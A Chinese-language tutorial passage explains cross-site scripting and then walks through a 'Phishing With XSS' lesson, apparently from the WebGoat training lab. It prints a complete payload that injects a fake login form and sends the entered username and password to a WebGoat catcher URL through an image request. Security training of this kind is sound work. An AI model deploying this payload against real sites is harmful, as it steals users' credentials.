XSS(Cross-Site Scripting)跨站脚本攻击,由于 html 和 js 都是解释执行的,那么如果对用户的输入过滤不够严格或者说不严格处理,那么当用户也输入一些 html 或者 js 的并被浏览器再次加载的时候也是可以被浏览器解释执行的。那么对于一些博客、贴吧等存在用户输入、又存在游客查看评论的地方,做好用户输入的过滤就很有必要。那么 XSS 能干什么呢?不仅可以用来进行钓鱼攻击,还可以用来窃取用户的数据进而静默转移,传送给黑客,想想 html 和 js 能干什么他就能干什么,当然远不止这些,我们还可以注入一些服务器语言,使得服务器端执行的时候也发生未知的结果。
1.1 Phishing With XSS(钓鱼攻击)
如果一个未经验证的用户输入一个 HTTP 响应时, XSS 很有可能发生,利用它就可以进行钓鱼攻击,在一个页面内添加一个伪官方网页就可以骗取用户的账号和口令。注意这里强调的是在 HTTP 响应时攻击,而不是请求,要知道如果是请求的话,那么就相当于是自己黑自己,多没意思,可如果是响应的话就意味着,别人发送请求,而你响应他虚假的页面,这样就可以用来对其进行欺骗。
首先,我们需要自己写一个页面,用于钓鱼,例如表 1 所示:
<script> function hack(){ alert("Had this been a real attack... Your credentials were just stolen.UserName="+document.forms[1].user.value+"Password:"+document.forms[1].pass.value); XSSImage = new Image(); XSSImage.src = "http://localhost/WebGoat/catcher?PROPERTY=yes&user="+document.forms[1].user.value+"&password="+document.forms[1].pass.value; }</script><form> <br><br><HR><H3>This feature requires account login :</H3><br><br> Enter UserName:<br><input type="text" id="user" name="user" /><br> Enter Password:<br><input type="password" id="pass" name="pass" /><br> <input type="button" id="login" name="login" value="login" οnclick="hack()" /> </form |